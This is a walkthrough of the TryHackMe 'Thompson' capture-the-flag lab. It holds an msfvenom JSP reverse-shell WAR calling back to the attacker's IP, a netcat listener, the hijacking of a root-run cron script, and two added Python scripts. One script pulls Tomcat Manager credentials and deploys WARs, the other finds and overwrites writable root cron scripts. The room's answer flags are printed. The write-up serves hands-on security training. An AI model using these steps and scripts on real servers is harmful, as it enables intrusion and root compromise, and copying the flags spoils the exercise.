Thompson-Walkthrough-TryHackMe

G N Vivekananda
4 min read · Jun 29, 2021

Dear friends, let us solve the challenges in the Thompson box at the link below.

Visit https://tryhackme.com/room/bsidesgtthompson and join the room.

Attacker (VPN) IP: 10.9.227.16

Target IP: 10.10.117.170

Today I'm going to show you a Tomcat-related CTF challenge: a boot2root machine from the BSides Guatemala (bsidesgt) room set. Let's get started and explore the vulnerabilities and exploits on this machine.

After hitting the Deploy button, we have the target's IP address (before starting, check that the box is up by pinging it).

Enumeration/Reconnaissance

I have used Nmap to check for open ports and services.

nmap -Pn -A 10.10.117.170

From the nmap scan we learn that three ports are open: 22/TCP (SSH), 8009/TCP (Apache JServ Protocol, AJP) and 8080/TCP (HTTP, Apache Tomcat). Let's open port 8080 in the browser and click on Manager App.

http://10.10.117.170:8080/

Clicking Manager App brings up a Basic-auth prompt asking for credentials.

Cancel the prompt and read the 401 Unauthorized page Tomcat serves instead: the stock error page includes an example tomcat-users.xml entry, and on this box nobody changed it, so the example credentials are the real ones.

There you can see username: tomcat, password: s3cret

Using those credentials, I was able to log into the server.

Exploit

Before logging in, I had googled around and found that the usual route from here is deploying a malicious WAR file through the Manager app (the "WAR backdoor"), for which there are numerous proofs of concept, including Metasploit's tomcat_mgr_upload module. One caveat: this is often filed under CVE-2017-12617, but that CVE is a different bug (unauthenticated JSP upload over HTTP PUT when the DefaultServlet's readonly parameter is set to false). What we use here is not a Tomcat vulnerability at all but the Manager app's intended deploy feature, so it requires valid Manager credentials.

Things are straightforward from here. First we need a malicious WAR file; I generated a JSP reverse shell in WAR format with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.9.227.16 lport=4444 -f war -o shell.war

Start a listener with netcat (Metasploit's multi/handler also works):

nc -lnvp 4444

Then, in the Manager app, choose shell.war under "WAR file to deploy" and click Deploy. The WAR's filename becomes its context path, so browsing to http://10.10.117.170:8080/shell/ executes the JSP and the reverse shell connects back to our listener.
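The two steps above, recovering the example credentials from the 401 page and deploying a WAR through the Manager app, as a small script. This is an added example, not code from the original write-up or from Tomcat: the target URL, the WAR filename and the context name are placeholders, and SAMPLE_401 is a constructed excerpt that mirrors the example snippet embedded in Tomcat's default manager 401 page.

```python
"""Recover the Manager credentials leaked by Tomcat's stock 401 page and
deploy a WAR through the Manager text interface.

Added example for this walkthrough, not code from the original write-up or
from Tomcat. The target URL, WAR filename and context name are placeholders;
SAMPLE_401 is a constructed excerpt in the shape of the default 401 page.
"""
import base64
import html
import re
import urllib.error
import urllib.request

# Constructed excerpt of the default manager 401 page (HTML-escaped, as served).
SAMPLE_401 = """
<p>For example, to add the <code>manager-gui</code> role to a user named
<code>tomcat</code> with a password of <code>s3cret</code>, add the following
to the config file listed above.</p>
<pre>
&lt;role rolename="manager-gui"/&gt;
&lt;user username="tomcat" password="s3cret" roles="manager-gui"/&gt;
</pre>
"""

USER_TAG_RE = re.compile(r"<user\b([^>]*?)/?>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def fetch_401_page(base_url):
    """Request /manager/html without credentials and return the 401 body."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/manager/html", timeout=15) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.read().decode(errors="replace")


def extract_manager_creds(page_body):
    """Return (username, password, [roles]) for every <user .../> entry the
    page embeds. The 401 page HTML-escapes the snippet, so unescape first."""
    creds = []
    for attrs in USER_TAG_RE.findall(html.unescape(page_body)):
        a = dict(ATTR_RE.findall(attrs))
        if "username" in a and "password" in a:
            roles = [r.strip() for r in a.get("roles", "").split(",") if r.strip()]
            creds.append((a["username"], a["password"], roles))
    return creds


def basic_auth_header(user, pwd):
    """Authorization header value the browser sends after the login prompt."""
    return "Basic " + base64.b64encode(f"{user}:{pwd}".encode()).decode()


def manager_request(base_url, user, pwd, path, data=None, method="GET"):
    """Authenticated request to the Manager app; returns the response body."""
    req = urllib.request.Request(base_url.rstrip("/") + path, data=data, method=method)
    req.add_header("Authorization", basic_auth_header(user, pwd))
    if data is not None:
        req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def list_apps(base_url, user, pwd):
    """GET /manager/text/list: one 'path:state:sessions:name' line per app."""
    return manager_request(base_url, user, pwd, "/manager/text/list")


def deploy_war(base_url, user, pwd, war_path, context):
    """PUT the WAR body to /manager/text/deploy?path=/<context>. The text
    interface needs the manager-script role; with manager-gui only, the
    upload goes through the HTML form at /manager/html (what the browser did)."""
    with open(war_path, "rb") as f:
        body = f.read()
    return manager_request(
        base_url, user, pwd,
        f"/manager/text/deploy?path=/{context}&update=true",
        data=body, method="PUT",
    )


if __name__ == "__main__":
    target = "http://10.10.117.170:8080"  # placeholder, adjust for your lab
    for user, pwd, roles in extract_manager_creds(fetch_401_page(target)):
        print(f"[*] candidate {user}:{pwd} roles={roles}")
        print(list_apps(target, user, pwd))
        print(deploy_war(target, user, pwd, "shell.war", "shell"))
        # Browsing to <target>/shell/ then runs the JSP and calls back.
```

If the account only holds manager-gui, the text-interface calls will answer 403 and you fall back to the browser upload exactly as in the walkthrough; the credential-extraction part still tells you what to type into the prompt.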

We have a shell! Sweet. Now I upgraded it to a fully interactive one.

To get an interactive TTY, spawn a pty with Python:

python -c 'import pty; pty.spawn("/bin/bash")'

user.txt flag (in jack's home directory):

39400c90bc683a41a8935e4719f181bf

Now it's time for privilege escalation. By now you know the drill: upload a script that checks for privilege-escalation vectors and run it. The one I normally use is linpeas.

It points at a file called id.sh in jack's home directory. We do not own it, but we can write to it, and its contents show it is a short bash script whose output lands in test.txt. Checking /etc/crontab explains why that matters: id.sh is run by root on a schedule, so whatever we put into it runs as root.

We can fetch the root flag by overwriting id.sh so that root's cron job copies it somewhere we can read. I replaced the contents of id.sh with a single command:

echo "cp /root/root.txt /home/jack/root.txt" > id.sh

Note that > truncates the file, so the original script (and its output to test.txt) is gone; that is fine here. The next time cron fires, root executes our line and drops a copy of the flag into /home/jack/root.txt. Because root creates that copy, its mode comes from root's umask; if it turns out not to be readable by jack, add chmod 644 /home/jack/root.txt to the script as well.

After waiting for the next cron run, I cat /home/jack/root.txt, and boom, we have the root flag.
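The check that makes this privilege escalation visible, root cron jobs whose script the current user can modify, written out as a script. This is an added example for the step above, not code from the original write-up or from linpeas. SAMPLE_CRONTAB is a constructed /etc/crontab in the shape of the situation on the box (root runs a script from jack's home every minute); the actual entry and paths on the machine will differ.

```python
"""Find root cron jobs whose script the current user can overwrite.

Added example for the privilege-escalation step above; it is not from the
original write-up or from linpeas. SAMPLE_CRONTAB is a constructed
/etc/crontab; the real entry and paths on the box will differ.
"""
import os
import re
import shlex

# Constructed sample in /etc/crontab format: m h dom mon dow user command.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    cd /home/jack && bash id.sh
*/5 *   * * *   jack    /home/jack/backup.sh
"""


def parse_system_crontab(text):
    """Return (user, command) pairs from system-crontab lines (5 time fields,
    user, command) or @reboot-style lines; skip comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        special = line.startswith("@")
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) != (3 if special else 7):
            continue
        jobs.append((parts[-2], parts[-1]))
    return jobs


def candidate_scripts(command):
    """Paths a job would execute, resolving relative names against any
    'cd DIR' earlier on the same command line (the id.sh pattern)."""
    cwd, paths = "/", []
    for segment in re.split(r"&&|\|\||;", command):
        try:
            toks = shlex.split(segment)
        except ValueError:
            continue  # unbalanced quotes: skip rather than guess
        if not toks:
            continue
        if toks[0] == "cd" and len(toks) > 1:
            cwd = toks[1] if os.path.isabs(toks[1]) else os.path.normpath(os.path.join(cwd, toks[1]))
            continue
        for tok in toks:
            if tok.startswith("-"):
                continue  # option, not a file
            if "/" in tok or tok.endswith((".sh", ".py", ".pl")):
                paths.append(tok if os.path.isabs(tok) else os.path.normpath(os.path.join(cwd, tok)))
    return paths


def writable_root_jobs(crontab_text, is_writable=None):
    """(path, command) for every root job whose script passes is_writable.
    Defaults to a real os.access(W_OK) check on this host; injectable for tests."""
    if is_writable is None:
        is_writable = lambda p: os.access(p, os.W_OK)
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in candidate_scripts(command):
            if is_writable(path):
                hits.append((path, command))
    return hits


def hijack_script(path, payload):
    """Replace a writable root-run script with our own command. The original
    contents are lost, which matters if the job was doing something useful."""
    with open(path, "w") as f:
        f.write("#!/bin/bash\n" + payload + "\n")


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for path, cmd in writable_root_jobs(f.read()):
            print(f"[!] writable script {path} run by root via: {cmd}")
```

Run it on the box after the shell upgrade; each hit is a file where hijack_script(path, "cp /root/root.txt /home/jack/root.txt") reproduces the step above. Per-user crontabs under /var/spool/cron and the /etc/cron.d drop-ins use the same format and can be fed to the same functions.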

root.txt flag:

d89d5391984c0450a95497153ae7ca3a

Done! Let us see the answers to the challenge questions now.

Task 1 Thompson

read user.txt and root.txt

Answer the questions below

user.txt

39400c90bc683a41a8935e4719f181bf

root.txt

d89d5391984c0450a95497153ae7ca3a

At last, we got the user.txt and root.txt flags, and the Thompson room on TryHackMe is complete. Thanks for reading, and I hope you enjoyed it. As I always mention in every blog, suggestions are always welcome and open for discussion. Happy Hacking!
